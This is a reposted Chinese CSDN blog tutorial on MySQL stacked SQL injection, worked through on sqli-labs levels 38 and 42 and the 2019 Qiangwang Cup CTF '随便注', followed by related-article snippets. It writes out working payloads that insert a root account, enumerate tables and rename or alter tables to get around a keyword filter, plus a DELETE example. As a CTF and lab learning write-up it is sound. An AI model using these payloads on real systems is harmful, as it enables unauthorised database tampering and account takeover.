mysql堆叠注入条件_白帽子:SQL注入之堆叠注入

最新推荐文章于 2024-03-10 22:30:53 发布
最新推荐文章于 2024-03-10 22:30:53 发布
阅读量308 收藏
点赞数
文章标签: mysql堆叠注入条件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31358991/article/details/113985820
版权
本文详细介绍了SQL注入中的堆叠注入原理,通过实例展示了如何利用堆叠注入进行数据库操作,包括创建、修改表和字段,以及在存在字符过滤的情况下绕过防护。文中还提到了在某些情况下,由于对username字段的转义而对password字段的直接POST提交导致的堆叠注入漏洞。最后,文章以实战案例解释了如何通过堆叠注入获取flag,揭示了堆叠注入的灵活性和潜在危害。
摘要由CSDN通过智能技术生成

原标题:白帽子:SQL注入之堆叠注入

在SQL语句中,语句的结束都是以`;`结尾,但是如果我们在`;`后面再加上一条SQL语句,两条语句会一起执行吗?这也就是造成堆叠注入的原因了

最简单的语句`select * from users;DELETE FROM test`

先查询user表,然后再从test数据库里删除user表。

下面我们进行实战

靶场:sql-libs38

先判断闭合点,为'

fd65bc11de408d036fca9f3c99dbb553.png

再构造payload:?id=1' order by 4 %23

2ba74098c67960fecaa84fe94d060d66.png

判断出列数为3列

第38关可以理解为盲注,第二条语句的对错不会给我们回显

好,我们先构造payload:`?id=-1'; insert into users(id,username,password) values(88,'aaa','bbb')%23`

但是呢页面没有回显,我们去数据库看一下

2d98937e5306e2d2e62604aedd79138e.png

最后一行,username:aaa,password:bbb已经成功插入进数据库

如果我们添加的是管理员的账号和密码,那又是什么样的结果。

这一关不明显,我们去试试第42关

sql-libs-42

a61fd5de84909355d26ab91537382b12.png

因为刚刚已经插入进去了aaa,现在直接构造payload登录

①username:`aaa';insert into users(id,username,password) values(60,'root','root')#`password:`bbb`

去查了数据库发现没有添加成功,但是语句没错,考虑对username进行了过滤或者其他防护措施。

②username:`aaa`password:`bbb';insert into users(id,username,password) values(60,'root','root')#`

再试试对password进行堆叠

1318a66dd072468b6a818241afa7147b.png

登陆成功

查看数据库

81274f19d19b208be79a06289e2893d4.png

插入成功了

去看了一下42关的源码

```$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];```对用户名进行了转义,但是password直接以post方式提交了,这就造成了堆叠注入。

再一某一例题

[强网杯 2019]随便注在这里插入图片描述先判断是否有注入点,试一下1'

491aea754474124b0483eda836b1c86a.png

注入点找到了

然后判断出列数

8840c901f31bf73ef53e1700f57416fd.png

222222

再用1' union select 1,database(); #出现了报错

6b46125daac7334211e8e46012f884de.png

select等字符被过滤了,正常注入不能用,报错注入也不行!

看了下大师傅的WP尝试用堆叠注入。

我们先构造payload:1' ;show database; #

查看数据库

3bb946de00dd6d4b927669ff5498f6bd.png

再次构造payload1' ;show tables; #查看有几个表

bd3be2bca39f3d5001339dd4bd8c217b.png

只有两个表从两个表里,我们再查询列构造payload:0'; show columns from words ;#

9e7ec0e5b1e3bad02a6bedf2c874f4e3.png

没有找到我们要的flag

再构造payload:

0';show columns from `1919810931114514`;#先前忘了给字符加单引号,试了n次也没成功!到最后加字符才知道自己的无知太可怕,浪费了很多时间!!!

dbb4b9ec935731a39900ccfd6055327a.png

找到了flag的的列,下一步就是如何让他回显出来

上图,我们知道正则匹配过滤了很多字符,但是没有过滤alert和rename,这就可以来波骚姿势了

①先把words表改为word1

②再利用rename将1919810931114514这个表修改为word

③再将flag字段修改成id

构造payload:0';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

c47c5817ab5946618676423d77de10c7.png

应该成功了

emmmmm,用1';show tables;#

8bef8d90cf23618b777b6951080a5313.png

修改成功了

访问0' or '1'='1

b027aa32e809f91a0e99d3dff8d1405b.png

得到flag

堆叠注入的骚姿势。返回搜狐,查看更多

责任编辑:

老韩大叔
关注
SQL_Injection_Payload:SQL注入有效负载列表
01-28
8. **堆叠查询**:在单个请求中执行多个查询,使得攻击者可以在一次注入中完成更复杂的操作。 9. **信息收集**:攻击者通常首先尝试获取数据库版本、用户列表、表名和列名等信息,以确定进一步的攻击策略。 10. **...
mysql堆叠注入条件,SQL注入 堆叠注入(Stack Injection)
weixin_28930803的博客
03-23 374
注入原理平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简...
SQL注入之路之五:堆叠注入
weixin_62715196的博客
08-12 301
初略的讲述一下堆叠注入的原理,记录一下自己的学习过程,但还有很多需要逐步去完善
堆叠注入原理解析
qq_45927819的博客
03-19 7927
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
sql注入堆叠注入
weixin_42566218的博客
02-19 9079
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
mysql堆叠注入条件_堆叠注入详解
weixin_39943383的博客
02-10 1033
0x00 堆叠注入定义Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。0x01 堆叠注入原理在SQL中,分号(;)是用来表示一条sql语句的结束。...
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
php mysql_real_escape_string、addslashes函数以及mysql绑定参数是PHP开发中常用的防止SQL注入攻击的三种主要方法。 mysql_real_escape_string函数是PHP中的一个函数,用于转义SQL语句中使用的字符串中的特殊字符...
information_schema数据库在SQL注入中的应用.docx
06-11
信息架构数据库在 SQL 注入中的应用 信息架构数据库(information_schema)是 MySQL 5 以上自带的系统数据库,它存放了 MySQL 服务器中所有数据库、表及其列的信息。该数据库相当于一个数据字典,提供了关于 MySQL ...
PHP+MysqlSQL注入源码 下载
04-25
【PHP+MySQLSQL注入】 在互联网开发中,PHP与MySQL是常见的组合,用于构建动态网站和应用程序。PHP是一种服务器端脚本语言,主要用于Web开发,可以与多种数据库系统配合,其中MySQL是最常用的一种开源关系型...
sql注入-堆叠+二次
xiaoheizi的博客
06-28 398
判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql注入。更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次。打开网站会员中心,点击创建简历,填写信息,一直到教育经历。查询操作,把总表中的内容在页面展示出来,因为。
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 5041
堆叠注入】相比其他注入能执行的操作更多
堆叠注入([强网杯 2019]随便注1)
热门推荐
Battery的博客
10-13 12万+
堆叠注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。堆叠注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。
sql注入知识---堆叠注入
尘玥的故事
04-11 1514
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1477
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
堆叠注入(stacked injecti)
m0_73248913的博客
12-28 526
表示一条sql语句的结束,在后面再次执行下一条sql语句。(union只能苹姐一条select语句)其实可以发现就是简单的都能用,和做sql是一样的操作。概念:执行多条sql语句一起执行。
sql-堆叠注入
zhhhb1005的博客
08-14 528
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
26-2 SQL注入攻击 - 堆叠注入(Stacked Injection)
最新发布
weixin_43263566的博客
03-10 509
堆叠注入(Stacked Injection)是指一次性执行多条 SQL 语句的注入技术。在实际应用中,堆叠注入通常指在MySQL等数据库中,通过在命令行中以分号(;)分隔每条语句来实现同时执行多条语句的注入攻击。因此,堆叠注入即为一堆(多条)SQL语句一起执行的注入攻击方式。
web漏洞-SQL注入漏洞扩展(堆叠查询注入)-SQLi LABS 38关到41关讲解
ran的博客
01-19 724
比如在注入时,需要得到管理员的账号和密码,但是这个密码是加密的,且无法解密,此时便可以利用堆叠注入向管理员用户的表内进行插入用户数据,创建用户来登录迂回的注入数据库,但是前提是网站的管理员必须是高权限才能完全创建用户。因为是插入的数据,所以新插入的管理员用户的密码是自定义的,将用户数据插入之后,就可以实施登录了,此时便可以忽略密码无法解密的问题。区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。”(返回执行的SQL语句并换行)。
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值